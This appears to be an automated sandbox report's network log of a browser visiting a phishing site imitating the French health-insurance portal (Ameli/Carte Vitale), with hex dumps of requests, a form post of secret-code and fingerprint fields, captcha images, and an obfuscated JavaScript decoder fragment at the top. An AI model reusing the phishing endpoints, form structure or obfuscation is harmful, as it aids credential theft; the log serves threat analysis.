                        Data Ascii: QRSTUVWXYZabcdefghijklmnopqrstuvwxyz()[]{}".indexOf(r),_=r=>u(r)>-1?"294NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm)(][}{"[u(r)]:r,d=function r(n){__interne__();var o=[];for(i=0;i<n.length;i++)(idx=n.charCodeAt(i))>=48&&idx<=57?idx<=52?o[i]=S


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        30192.168.2.649754104.17.3.1844434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:24 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/2115433930:1720008719:mWbT4_enhs2h_w32qRfd66TmkEtkTYfuBx_guyabV0E/89d6efe14aad728f/0228ee3c2a32d26 HTTP/1.1
                        Host: challenges.cloudflare.com
                        Connection: keep-alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: */*
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-07-03 12:39:24 UTC375INHTTP/1.1 404 Not Found
                        Date: Wed, 03 Jul 2024 12:39:24 GMT
                        Content-Type: application/json
                        Content-Length: 7
                        Connection: close
                        cf-chl-out: SsK6Apw3sGoogNO2grTi1g==$t3qHip9/5g2pwWINQMOuPQ==
                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                        Server: cloudflare
                        CF-RAY: 89d6f02b7a3b0c9d-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-07-03 12:39:24 UTC7INData Raw: 69 6e 76 61 6c 69 64
                        Data Ascii: invalid


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        31192.168.2.649755102.48.55.1784434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:24 UTC434OUTGET /?iauthentification HTTP/1.1
                        Host: cartevitale-ameli.santeassures-informations.eu
                        Connection: keep-alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: */*
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
                        2024-07-03 12:39:25 UTC317INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:22 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 2
                        Connection: close
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        Referrer-Policy: no-referrer
                        Strict-Transport-Security: max-age=604800
                        2024-07-03 12:39:25 UTC2INData Raw: 6f 6b
                        Data Ascii: ok


                        Session IDSource IPSource PortDestination IPDestination Port
                        32192.168.2.64975340.113.103.199443
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:24 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 2b 42 45 4a 77 73 51 49 4c 55 71 56 46 6e 74 66 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 65 61 65 33 62 31 31 30 64 64 32 31 35 65 38 0d 0a 0d 0a
                        Data Ascii: CNT 1 CON 305MS-CV: +BEJwsQILUqVFntf.1Context: ceae3b110dd215e8
                        2024-07-03 12:39:24 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                        2024-07-03 12:39:24 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 2b 42 45 4a 77 73 51 49 4c 55 71 56 46 6e 74 66 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 65 61 65 33 62 31 31 30 64 64 32 31 35 65 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 77 73 46 52 75 4b 50 31 71 51 66 6b 2f 66 53 43 56 6b 4a 2b 72 55 4c 71 62 42 6f 6a 52 54 6b 46 64 54 55 53 49 30 2f 2f 5a 2f 4d 4e 4d 64 51 54 41 68 36 4d 5a 48 36 62 6a 71 33 51 75 4f 50 42 65 33 48 7a 6e 76 42 69 48 34 5a 47 66 67 33 58 73 33 58 4f 37 76 61 65 74 78 74 58 5a 46 36 51 7a 68 35 7a 34 41 38 73 38 55 78 32
                        Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: +BEJwsQILUqVFntf.2Context: ceae3b110dd215e8<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYwsFRuKP1qQfk/fSCVkJ+rULqbBojRTkFdTUSI0//Z/MNMdQTAh6MZH6bjq3QuOPBe3HznvBiH4ZGfg3Xs3XO7vaetxtXZF6Qzh5z4A8s8Ux2
                        2024-07-03 12:39:24 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 2b 42 45 4a 77 73 51 49 4c 55 71 56 46 6e 74 66 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 65 61 65 33 62 31 31 30 64 64 32 31 35 65 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: +BEJwsQILUqVFntf.3Context: ceae3b110dd215e8<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                        2024-07-03 12:39:25 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                        Data Ascii: 202 1 CON 58
                        2024-07-03 12:39:25 UTC58INData Raw: 4d 53 2d 43 56 3a 20 43 62 74 73 48 68 32 51 78 45 65 56 53 71 77 4e 31 51 4c 4b 36 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                        Data Ascii: MS-CV: CbtsHh2QxEeVSqwN1QLK6A.0Payload parsing failed.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        33192.168.2.649756102.48.55.1784434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:25 UTC817OUTPOST /?authentification&uri=/Fi4bPy-N3Rtv-5zOg8-QNWuj-sbXEl-blGhi-4CWIj-zDacF-Pn/index.html&search= HTTP/1.1
                        Host: cartevitale-ameli.santeassures-informations.eu
                        Connection: keep-alive
                        Content-Length: 8208
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-platform: "Windows"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLufjR9x58hItalyA
                        Accept: */*
                        Origin: https://cartevitale-ameli.santeassures-informations.eu
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
                        2024-07-03 12:39:25 UTC8208OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 4c 75 66 6a 52 39 78 35 38 68 49 74 61 6c 79 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 65 63 75 72 69 74 61 73 5f 73 65 63 72 65 74 5f 63 6f 64 65 5f 31 22 0d 0a 0d 0a 33 63 36 66 38 65 65 37 62 37 37 65 62 34 38 35 35 39 30 36 62 62 31 61 63 62 61 38 34 65 63 61 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 4c 75 66 6a 52 39 78 35 38 68 49 74 61 6c 79 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 70 5f 63 6f 6c 6c 65 63 74 22 0d 0a 0d 0a 7b 35 3a 22 74 61 76 65 67 46 73 22 2c 36 3a 22 76 66
                        Data Ascii: ------WebKitFormBoundaryLufjR9x58hItalyAContent-Disposition: form-data; name="securitas_secret_code_1"3c6f8ee7b77eb4855906bb1acba84eca------WebKitFormBoundaryLufjR9x58hItalyAContent-Disposition: form-data; name="fp_collect"{5:"tavegFs",6:"vf
                        2024-07-03 12:39:25 UTC317INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:23 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 4
                        Connection: close
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        Referrer-Policy: no-referrer
                        Strict-Transport-Security: max-age=604800
                        2024-07-03 12:39:25 UTC4INData Raw: 74 72 75 65
                        Data Ascii: true


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        34192.168.2.649759102.48.55.1784434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:26 UTC810OUTGET /Fi4bPy-N3Rtv-5zOg8-QNWuj-sbXEl-blGhi-4CWIj-zDacF-Pn/index.html HTTP/1.1
                        Host: cartevitale-ameli.santeassures-informations.eu
                        Connection: keep-alive
                        Cache-Control: max-age=0
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-Dest: document
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
                        2024-07-03 12:39:27 UTC343INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:24 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 1919
                        Connection: close
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        Vary: Accept-Encoding
                        Referrer-Policy: no-referrer
                        Strict-Transport-Security: max-age=604800
                        2024-07-03 12:39:27 UTC1919INData Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 41 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 73 65 20 52 6f 64 72 69 67 75 65
                        Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><link rel="icon" href="data:,"><meta name="viewport" content="width=device-width, initial-scale=1"><meta http-equiv="Content-Type" content="text/html;" /><meta name="Author" content="Jose Rodrigue


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        35192.168.2.649760102.48.55.1784434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:26 UTC509OUTGET /?authentification&uri=/Fi4bPy-N3Rtv-5zOg8-QNWuj-sbXEl-blGhi-4CWIj-zDacF-Pn/index.html&search= HTTP/1.1
                        Host: cartevitale-ameli.santeassures-informations.eu
                        Connection: keep-alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: */*
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
                        2024-07-03 12:39:27 UTC343INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:24 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 1919
                        Connection: close
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        Vary: Accept-Encoding
                        Referrer-Policy: no-referrer
                        Strict-Transport-Security: max-age=604800
                        2024-07-03 12:39:27 UTC1919INData Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 41 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 73 65 20 52 6f 64 72 69 67 75 65
                        Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><link rel="icon" href="data:,"><meta name="viewport" content="width=device-width, initial-scale=1"><meta http-equiv="Content-Type" content="text/html;" /><meta name="Author" content="Jose Rodrigue


                        Session IDSource IPSource PortDestination IPDestination Port
                        36192.168.2.64976140.113.103.199443
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:27 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 37 56 6d 4b 52 53 4c 6b 38 6b 79 4e 76 74 50 64 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 65 35 33 37 31 64 64 33 64 61 61 34 31 66 32 0d 0a 0d 0a
                        Data Ascii: CNT 1 CON 305MS-CV: 7VmKRSLk8kyNvtPd.1Context: 7e5371dd3daa41f2
                        2024-07-03 12:39:27 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                        2024-07-03 12:39:27 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 37 56 6d 4b 52 53 4c 6b 38 6b 79 4e 76 74 50 64 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 65 35 33 37 31 64 64 33 64 61 61 34 31 66 32 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 77 73 46 52 75 4b 50 31 71 51 66 6b 2f 66 53 43 56 6b 4a 2b 72 55 4c 71 62 42 6f 6a 52 54 6b 46 64 54 55 53 49 30 2f 2f 5a 2f 4d 4e 4d 64 51 54 41 68 36 4d 5a 48 36 62 6a 71 33 51 75 4f 50 42 65 33 48 7a 6e 76 42 69 48 34 5a 47 66 67 33 58 73 33 58 4f 37 76 61 65 74 78 74 58 5a 46 36 51 7a 68 35 7a 34 41 38 73 38 55 78 32
                        Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 7VmKRSLk8kyNvtPd.2Context: 7e5371dd3daa41f2<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYwsFRuKP1qQfk/fSCVkJ+rULqbBojRTkFdTUSI0//Z/MNMdQTAh6MZH6bjq3QuOPBe3HznvBiH4ZGfg3Xs3XO7vaetxtXZF6Qzh5z4A8s8Ux2
                        2024-07-03 12:39:27 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 37 56 6d 4b 52 53 4c 6b 38 6b 79 4e 76 74 50 64 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 65 35 33 37 31 64 64 33 64 61 61 34 31 66 32 0d 0a 0d 0a
                        Data Ascii: BND 3 CON\QOS 56MS-CV: 7VmKRSLk8kyNvtPd.3Context: 7e5371dd3daa41f2
                        2024-07-03 12:39:27 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                        Data Ascii: 202 1 CON 58
                        2024-07-03 12:39:27 UTC58INData Raw: 4d 53 2d 43 56 3a 20 65 57 32 58 4a 43 66 59 41 6b 32 72 70 70 37 77 5a 49 55 51 5a 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                        Data Ascii: MS-CV: eW2XJCfYAk2rpp7wZIUQZw.0Payload parsing failed.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        37192.168.2.649758102.48.55.1784434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:27 UTC631OUTGET /?captcha_image HTTP/1.1
                        Host: cartevitale-ameli.santeassures-informations.eu
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: no-cors
                        Sec-Fetch-Dest: image
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
                        2024-07-03 12:39:27 UTC306INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:25 GMT
                        Content-Type: image/jpeg
                        Content-Length: 3370
                        Connection: close
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        Referrer-Policy: no-referrer
                        Strict-Transport-Security: max-age=604800
                        2024-07-03 12:39:27 UTC3370INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff fe 00 3b 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 39 30 29 2c 20 71 75 61 6c 69 74 79 20 3d 20 38 30 0a ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 00 46 00 c8 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00
                        Data Ascii: JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 80C%# , #&')*)-0-(0%()(C(((((((((((((((((((((((((((((((((((((((((((((((((((F"


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        38192.168.2.649763102.48.55.1784434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:28 UTC430OUTGET /?captcha_image HTTP/1.1
                        Host: cartevitale-ameli.santeassures-informations.eu
                        Connection: keep-alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: */*
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
                        2024-07-03 12:39:28 UTC306INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:26 GMT
                        Content-Type: image/jpeg
                        Content-Length: 3114
                        Connection: close
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        Referrer-Policy: no-referrer
                        Strict-Transport-Security: max-age=604800
                        2024-07-03 12:39:28 UTC3114INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff fe 00 3b 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 39 30 29 2c 20 71 75 61 6c 69 74 79 20 3d 20 38 30 0a ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 00 46 00 c8 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00
                        Data Ascii: JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 80C%# , #&')*)-0-(0%()(C(((((((((((((((((((((((((((((((((((((((((((((((((((F"


                        Session IDSource IPSource PortDestination IPDestination Port
                        39192.168.2.64976440.113.103.199443
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:43 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 73 42 33 49 58 58 47 48 70 45 36 54 58 42 4c 79 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 36 37 66 33 61 33 63 38 65 33 37 62 65 36 65 0d 0a 0d 0a
                        Data Ascii: CNT 1 CON 305MS-CV: sB3IXXGHpE6TXBLy.1Context: 767f3a3c8e37be6e
